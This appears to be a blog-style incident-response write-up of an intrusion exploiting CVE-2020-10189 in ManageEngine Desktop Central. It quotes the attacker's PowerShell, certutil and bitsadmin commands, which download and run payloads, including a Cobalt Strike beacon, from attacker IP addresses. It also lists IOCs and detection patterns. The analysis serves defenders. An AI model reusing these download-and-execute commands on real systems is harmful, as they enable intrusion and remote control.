1/11

Analysis Of Exploitation: CVE-2020-10189
blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/

The Recon incident response team recently worked an intrusion case involving a ManageEngine
Desktop Central server that was affected by CVE-2020-10189.

Zoho ManageEngine Desktop Central 10 allows remote code execution because of
deserialization of untrusted data in getChartImage in the FileStorage class. This is related
to the CewolfServlet and MDMLogUploaderServlet servlets.

https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle

Remote Code Execution vulnerability disclosed on Twitter

During our research of Desktop Central vulnerabilities we located a post on Twitter from a
researcher who had disclosed an RCE for Desktop Central on March 5, 2020 (Figure 1).

Figure 1 - Vulnerability disclosed on Twitter
 
Research on CVE-2020-10189 also showed that vulnerable Desktop Central servers were
searchable on Shodan, a popular search engine for Internet-connected devices often used by
attackers looking for vulnerable targets (Figure 2).

https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle
https://www.shodan.io/


2/11

 Figure 2 - Vulnerable Desktop

Central servers searchable on Shodan

 
Initial compromise was determined based on a suspicious PowerShell download cradle that
contained instructions to download files from a dotted quad url.

One of the earliest activities carried out by the actor are a few suspicious PowerShell download
commands.  The commands contained instructions to
download install.bat  and storesyncsvc.dll  to C:\Windows\Temp  and then immediately
execute install.bat  (figure 3).

cmd /c powershell $client = new-object 
System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:
$client = new-object 
System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll

 Figure 3 -

Suspicious PowerShell download commands
The install.bat  script contained instructions to install storesyncsvc.dll  as a service on
the system. (Figure 4).



3/11

 Figure

4 - Install.bat contents
 
Predictably, within seconds of the suspicious PowerShell commands being run, we observed the
installation of a new service with the Service Name StorSyncSvc  and Display Name
of Storage Sync Service  (Figure 5).



4/11

 Figure 5 - Storage Sync

Service install
 
OSINT quickly confirmed storesyncsvc.dll  to be previously observed by others hit by this
campaign. VirusTotal results indicated that several detection engines had already
classified storesyncsvc.dll  as malware.

https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e89
25e23bbeaa1c/details

Leveraging Process Tracking to Identify Application Exploitation

Knowing that an RCE had been disclosed via Twitter on March 5, 2020, only a few days prior to
this intrusion, we already had a strong theory on the attack vector being exploitation of the Zoho
ManageEngine Desktop Central application.

Review of Sysmon process creation events indicated
that C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe  was the process
responsible for executing the PowerShell Download commands (Figure 6).

 Figure 6 -

ParentImage responsible for PowerShell download

https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details


5/11

 
Looking at processes in memory, we also observed the parent/child relationship between the
Desktop Central java.exe  application, cmd.exe  and 2.exe  (Figure 7).

 Figure

7 - java.exe  parent/child process relationships

Leveraging Filesystem Artifacts to Identify Application Exploitation

To further validate our theory, we compared the artifacts that had been collected from the affected
Desktop Central server to the POC that had been published and determined that the attacker had
likely leveraged the CVE-2020-10189 vulnerability to run code on this vulnerable system.

Through filesystem timeline analysis we determined that a traversal file write had likely occurred
on the system with the file names  _chart  (Figure 8) and logger.zip  (Figure 9).  

 Figure 8 - File

system analysis _chart



6/11

 Figure 9 - File

system analysis logger.zip
 
These file names were also referenced in the POC that had been released
by @Steventseeley (Figure 10).

 Figure 10 - POC

references to _chart  and logger.zip , reference: https://srcincite.io/pocs/src-2020-
0011.py.txt

Command and Control Payload Introduced To System

https://twitter.com/steventseeley
https://srcincite.io/pocs/src-2020-0011.py.txt


7/11

Subsequent process creation logs revealed cmd.exe  and certutil.exe  commands being
used to download and execute 2.exe  (Figure 11). Further analysis revealed a high likelihood of
 2.exe  being part of the popular post-exploitation and C2 tool Cobalt Strike.

cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe

 Figure 11 -

Certutil commands 
OSINT revealed that 2.exe  was already identified as malware by several detection engines on
VirusTotal: https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a
71d2e26242cd9a80e67309/details

Leveraging app.any.run sandbox (Figure 12) and memory analysis of the malware further
confirmed the likelihood of 2.exe  being a hosted Cobalt Strike Beacon payload.

 Figure

12 - 2.exe  classified as Cobalt Strike Beacon
https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67
309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6

YARA ANALYSIS SUPPORTS 2.EXE CLASSIFICATION AS COBALT STRIKE

We performed a yara scan against all memory sections in use by the known malware, 2.exe .
The yara scan results further supported the theory of 2.exe  resembling a Cobalt Strike beacon
among several other possible malware signature hits (Figure 13).

https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/details
https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6
https://blog.reconinfosec.com/p/f98991ee-0e11-4f43-9b5f-bd0bf7611a40/2.exe


8/11

 Figure 13 - Yarascan results

Leveraging Volatility’s malfind plugin, we identified several memory sections with potential signs
of code injection.  We fired off another yara scan, this time against the memory sections dumped
by malfind. This provided additional validation of the likely presence of a Cobalt Strike Beacon.
See that entire process in the asciinema recording below (Figure 14).

 
Figure 14 - Yarascan against malfind output
We then examined malfind’s output for evidence of code injection and identified suspicious
memory sections within svchost.exe  (Figure 15).  OSINT research led us to a researcher that
had reversed the malware and found the area responsible for injecting code
into svchost.exe  (Figure 16).  

 Figure

15 - Our analysis of svchost containing injected code

https://asciinema.org/a/308852


9/11

 Figure

16 - @VK_Intel’s analysis showing likely inject function
Reference:

Among the post-compromise activities, we observed malicious Bitsadmin commands that
contained instructions to transfer install.bat  from 66.42.96.220  over suspicious
port 12345 .

Our analysts observed bitsadmin commands being run on the Desktop Central server which
contained the same IP address, port and the same install.bat file called in the PowerShell
download commands (Figure 17).

cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat 
C:\Users\Public\install.bat 

 Figure

17 - Bitsadmin commands

Credential Access

We also observed potential credential access activity. A common technique for attackers to
perform credential dumping is using a malicious process (SourceImage) to access another
process (the TargetImage). Most commonly, lsass.exe  is targeted as it often contains sensitive
information such as account credentials.

Here, we observed the SourceImage 2.exe  accessing the TargetImage lsass.exe  (Figure
18).  The Cobalt Strike Beacon contains native credential dumping capabilities similar
to Mimikatz. The only required condition to use this capability is SYSTEM privileges, which the

https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa


10/11

attacker had.  The event below provides sufficient evidence that the risk of credential access is
high.

 Figure 18

- 2.exe  accessing lsass.exe

Tools For IR Teams Dealing With Similar Intrusions

During our analysis of this intrusion, we added a few collection targets to Eric
Zimmerman's KAPE tool to add the relevant logs to triage efforts. Read more about KAPE.

Example usage targeting relevant logs (tune for your use-case):

kape.exe --tsource C: --tdest c:\temp\tout --tflush --target ManageEngineLogs

IOCs

Storesyncsvc.dll

MD5: 5909983db4d9023e4098e56361c96a6f
SHA256: f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c

Install.bat

MD5: 7966c2c546b71e800397a67f942858d0
SHA256: de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc

2.exe

MD5: 3e856162c36b532925c8226b4ed3481c
SHA256: d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309

66[.]42[.]98[.]220

91[.]208[.]184[.]78

74[.]82[.]201[.]8

Detection

Florian Roth of the Sigma project has created a signature to detect some of the techniques
leveraged by the attackers:

https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_
2020_10189.yml

https://learn.duffandphelps.com/kape
https://github.com/EricZimmerman/KapeFiles/commit/c5ca95acd929bc3c6ab613e3e43d52504a478f03
https://binaryforay.blogspot.com/2019/02/introducing-kape.html
https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml


11/11

Our analysis of this attack also found that detection based on command-line activity in process
creation logs would be valuable.

ParentImage | endswith:  
'DesktopCentral_Server\jre\bin\java.exe' 

CommandLine | contains:  
'*powershell*' 
'*certutil*' 
'*bitsadmin*' 

[UPDATE]

The researchers at Fireeye published an excellent article that contained some of the same
findings and included attribution to APT41. You can read more about it here:

https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-
using-multiple-exploits.html
Tags: DFIR, Incident Response, Forensics, SecOps, InfoSec, Defense, Malware, Exploit, CVE-
2020-10189, Intel Sharing, Zoho, Vulnerability, ManageEngine

Written by Luke Rusten

Security Operations Manager

https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
https://blog.reconinfosec.com/topic/dfir
https://blog.reconinfosec.com/topic/incident-response
https://blog.reconinfosec.com/topic/forensics
https://blog.reconinfosec.com/topic/secops
https://blog.reconinfosec.com/topic/infosec
https://blog.reconinfosec.com/topic/defense
https://blog.reconinfosec.com/topic/malware
https://blog.reconinfosec.com/topic/exploit
https://blog.reconinfosec.com/topic/cve-2020-10189
https://blog.reconinfosec.com/topic/intel-sharing
https://blog.reconinfosec.com/topic/zoho
https://blog.reconinfosec.com/topic/vulnerability
https://blog.reconinfosec.com/topic/manageengine
https://blog.reconinfosec.com/author/luke-rusten